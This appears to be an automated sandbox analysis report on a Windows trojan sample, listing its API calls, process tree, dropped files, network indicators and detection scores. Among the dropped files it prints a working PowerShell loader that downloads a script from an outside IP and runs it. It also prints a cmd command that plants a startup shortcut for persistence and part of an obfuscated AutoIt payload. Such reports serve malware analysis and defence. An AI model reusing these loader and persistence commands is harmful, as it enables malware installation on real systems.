Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1BBC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF75F1BBC70
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1BB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF75F1BB7C0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1C72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00007FF75F1C72A8
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1C71F4 FindFirstFileW,FindClose,0_2_00007FF75F1C71F4
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F182F50 FindFirstFileExW,0_2_00007FF75F182F50
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1CA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00007FF75F1CA874
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1C6428 FindFirstFileW,FindNextFileW,FindClose,0_2_00007FF75F1C6428
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1CA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF75F1CA4F8
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1CA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF75F1CA350
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B64005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00B64005
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6494A GetFileAttributesW,FindFirstFileW,FindClose,5_2_00B6494A
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00B6C2FF
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00B6CD9F
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6CD14 FindFirstFileW,FindClose,5_2_00B6CD14
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00B6F5D8
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00B6F735
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00B6FA36
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B63CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00B63CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002B4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_002B4005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002B494A GetFileAttributesW,FindFirstFileW,FindClose,12_2_002B494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_002BC2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BCD14 FindFirstFileW,FindClose,12_2_002BCD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,12_2_002BCD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_002BF5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_002BF735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_002BFA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002B3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_002B3CE2
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F161D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_00007FF75F161D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: Guard.exe, 00000005.00000002.2929941093.0000000004389000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
Source: powershell.exe, 00000003.00000002.1821309242.000001E2CBC95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}t
Source: wscript.exe, 0000000B.00000002.1921257420.000002283AC10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G;
Source: powershell.exe, 00000003.00000002.1820987173.000001E2CBC42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: SwiftWrite.pif, 0000000C.00000002.2930061430.00000000042A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1D0A00 BlockInput,0_2_00007FF75F1D0A00
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1437B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00007FF75F1437B0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F165BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00007FF75F165BC0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1D7634 LoadLibraryA,GetProcAddress,0_2_00007FF75F1D7634
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1AD868 WaitForSingleObject,UnloadUserProfile,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,0_2_00007FF75F1AD868
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1659C8 SetUnhandledExceptionFilter,0_2_00007FF75F1659C8
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1657E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF75F1657E4
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F17AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF75F17AF58
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F188FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF75F188FE4
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B2A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00B2A385
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B2A354 SetUnhandledExceptionFilter,5_2_00B2A354
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0027A354 SetUnhandledExceptionFilter,12_2_0027A354
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0027A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0027A385

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\EO3RT0fEfb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1ACE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00007FF75F1ACE68
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1437B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00007FF75F1437B0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1B9420 SendInput,keybd_event,0_2_00007FF75F1B9420
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1BD158 mouse_event,0_2_00007FF75F1BD158
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"Jump to behavior
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1AC858 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00007FF75F1AC858
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1AD540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00007FF75F1AD540
Source: EO3RT0fEfb.exe, Guard.exe.1.dr, SwiftWrite.pif.5.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: EO3RT0fEfb.exe, Guard.exe, SwiftWrite.pifBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F17FD20 cpuid 0_2_00007FF75F17FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\EO3RT0fEfb.exe | Code function: 0_2_00007FF75F17BEF8 GetSystemTimeAsFileTime,0_2_00007FF75F17BEF8
Source: C:\Users\user\Desktop\EO3RT0fEfb.exe | Code function: 0_2_00007FF75F1A2BCF GetUserNameW,0_2_00007FF75F1A2BCF
Source: C:\Users\user\Desktop\EO3RT0fEfb.exe | Code function: 0_2_00007FF75F182650 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00007FF75F182650
Source: C:\Users\user\Desktop\EO3RT0fEfb.exe | Code function: 0_2_00007FF75F161D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_00007FF75F161D80
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: SwiftWrite.pif | Binary or memory string: WIN_81
Source: SwiftWrite.pif | Binary or memory string: WIN_XP
Source: SwiftWrite.pif | Binary or memory string: WIN_XPe
Source: SwiftWrite.pif | Binary or memory string: WIN_VISTA
Source: EO3RT0fEfb.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pif | Binary or memory string: WIN_7
Source: SwiftWrite.pif | Binary or memory string: WIN_8
Source: SwiftWrite.pif.5.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\Desktop\EO3RT0fEfb.exe | Code function: 0_2_00007FF75F1D4074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00007FF75F1D4074
Source: C:\Users\user\Desktop\EO3RT0fEfb.exe | Code function: 0_2_00007FF75F1D3940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00007FF75F1D3940
Source: C:\Users\Public\Guard.exe | Code function: 5_2_00B7696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,5_2_00B7696E
Source: C:\Users\Public\Guard.exe | Code function: 5_2_00B76E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_00B76E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 12_2_002C696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,12_2_002C696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 12_2_002C6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_002C6E32
[Table: MITRE ATT&CK matrix. Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact.]
Behavior Graph ID: 1577214 | Sample: EO3RT0fEfb.exe | Startdate: 18/12/2024 | Architecture: WINDOWS | Score: 100

  • DNS/IP: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
  • Signatures: Icon mismatch, binary includes an icon from a different legit application in order to fool users; Multi AV Scanner detection for submitted file; Sigma detected: Drops script at startup location; 9 other signatures
  • EO3RT0fEfb.exe (started)
      • Dropped: C:\Users\Public\PublicProfile.ps1, ASCII
      • Signatures: Suspicious powershell command line found; Binary is likely a compiled AutoIt script file; Bypasses PowerShell execution policy
      • powershell.exe (started)
          • Dropped: C:\Users\Public\Secure.au3, Unicode
          • Guard.exe (started)
              • Dropped: C:\Users\user\AppData\...\SwiftWrite.pif, PE32
              • Dropped: C:\Users\user\AppData\Local\...\SwiftWrite.js, ASCII
              • Signature: Drops PE files with a suspicious file extension
              • cmd.exe (started)
                  • Dropped: C:\Users\user\AppData\...\SwiftWrite.url, MS
                  • conhost.exe (started)
          • conhost.exe (started)
      • powershell.exe (started)
          • DNS/IP: 139.99.188.124, 49730, 49731, 80, OVHFR, Canada
          • Dropped: C:\Users\Public\Guard.exe, PE32
          • Signatures: Drops PE files to the user root directory; Powershell drops PE file
          • conhost.exe (started)
  • wscript.exe (started)
      • Signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
      • SwiftWrite.pif (started)

Source | Detection | Scanner | Label
EO3RT0fEfb.exe | 55% | ReversingLabs | Win64.Trojan.Smokeloader
EO3RT0fEfb.exe | 46% | Virustotal |

Source | Detection | Scanner | Label
C:\Users\Public\Guard.exe | 8% | ReversingLabs |
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | 8% | ReversingLabs |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://139.99.188.124 | 0% | Avira URL Cloud | safe
http://139.99.HB | 0% | Avira URL Cloud | safe
http://139.99.188.124/aiSMo | 0% | Avira URL Cloud | safe
http://139.99.188.124/ucZfzm.txt | 0% | Avira URL Cloud | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://139.99.188.124/ucZfzm.txt | true | Avira URL Cloud: safe | unknown
http://139.99.188.124/aiSMo | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
139.99.188.124 | unknown | Canada | 16276 | OVHFR | true

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1577214
Start date and time: 2024-12-18 09:31:38 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: EO3RT0fEfb.exe
renamed because original name is a hash value
Original Sample Name: c6a10001e9cd00207400da197bc724aed97fc6dde44c7b4b6ab7bf8c0916a429.exe
Detection: MAL
Classification: mal100.expl.evad.winEXE@15/12@2/1
EGA Information:
  • Successful, ratio: 75%
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 47
  • Number of non-executed functions: 255
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
  • Excluded IPs from analysis (whitelisted): 20.12.23.50, 173.222.162.32, 13.107.246.63, 172.202.163.200
  • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target powershell.exe, PID 7760 because it is empty
  • Not all processes where analyzed, report is missing behavior information
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Time | Type | Description
03:32:31 | API Interceptor | 79x Sleep call for process: powershell.exe modified
03:33:19 | API Interceptor | 2946x Sleep call for process: Guard.exe modified
03:33:34 | API Interceptor | 1949x Sleep call for process: SwiftWrite.pif modified
08:32:44 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 893608
Entropy (8bit): 6.62028134425878
Encrypted: false
SSDEEP: 12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5: 18CE19B57F43CE0A5AF149C96AECC685
SHA1: 1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256: D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512: A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious: true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 8%
                                                          Process:C:\Users\user\Desktop\EO3RT0fEfb.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):484
                                                          Entropy (8bit):5.26353969417032
                                                          Encrypted:false
                                                          SSDEEP:12:f73/owLiSFEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:f73/ESCknZ9LzjYnRSb8Cba
                                                          MD5:8070A3B81AF99A8471E266DD49ED4B79
                                                          SHA1:AE12EFBCBCBBE01B21E422EF999678DA47511B91
                                                          SHA-256:6B32D23B6D0A636B061994CB9863C4890A0505BEBFFA828D0BC48D7A2410945F
                                                          SHA-512:81CDE6C9D8B044A22762D18ECE558126D6658E9AA1F5ED580A938DF5F7875158DC2A2594325EB98AE212486881C255FDA3A90BE587CB0DB84D8CED4B304A7F5E
                                                          Malicious:true
                                                          Preview:[string]$fU5L = "http://139.99.188.124/ucZfzm.txt"..[string]$oF6L = "C:\Users\Public\Secure.au3"..[string]$exePath = "C:\Users\Public\Guard.exe"....# Download the content from the URL..$wResp = New-Object System.Net.WebClient..$fCont = $wResp.DownloadString($fU5L)....# Save the downloaded content to the output file..Set-Content -Path $oF6L -Value $fCont -Encoding UTF8....# Run the executable with the output file as an argument..Start-Process -FilePath $exePath -ArgumentList $oF6L
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                          Category:dropped
                                                          Size (bytes):1247847
                                                          Entropy (8bit):5.140898523868387
                                                          Encrypted:false
                                                          SSDEEP:12288:28V+jcfSzZ7KZTGZ37mDHOQ2FDx3Ezfe3d:qcU7WHOQ2dxDN
                                                          MD5:CFA6D039D484DE0F6DCF14F2B6C386F1
                                                          SHA1:1F70DD6C2234DB964A3202221D3661858E81FF95
                                                          SHA-256:33649162845B1808B3C6F526D3793966CA000C141F8D5EC2DA46ED9AE6BB7EEA
                                                          SHA-512:7297EE09E534C2CFFE6F58FC66B753CB8E66FDDB03114E143417E8B88F12E39D0D86914F6C1E41CFAFF814C1B7C7FA52E4BA5C523713DC4DE5BC31384DE15665
                                                          Malicious:true
                                                          Preview:.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):0.34726597513537405
                                                          Encrypted:false
                                                          SSDEEP:3:Nlll:Nll
                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                          Malicious:false
                                                          Preview:@...e...........................................................
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Users\Public\Guard.exe
                                                          File Type:ASCII text, with very long lines (1266)
                                                          Category:dropped
                                                          Size (bytes):1247844
                                                          Entropy (8bit):5.14085872849876
                                                          Encrypted:false
                                                          SSDEEP:12288:D8V+jcfSzZ7KZTGZ37mDHOQ2FDx3Ezfe3d:DcU7WHOQ2dxDN
                                                          MD5:AF26E78A7B1688F22E301DE5FF48F75E
                                                          SHA1:DA88E5E83E9FBB85B938C90D49DA00788EF470F6
                                                          SHA-256:3989B561BA9A062198ED96BA5571375C47AADC81A1D783756A74A842A4F72393
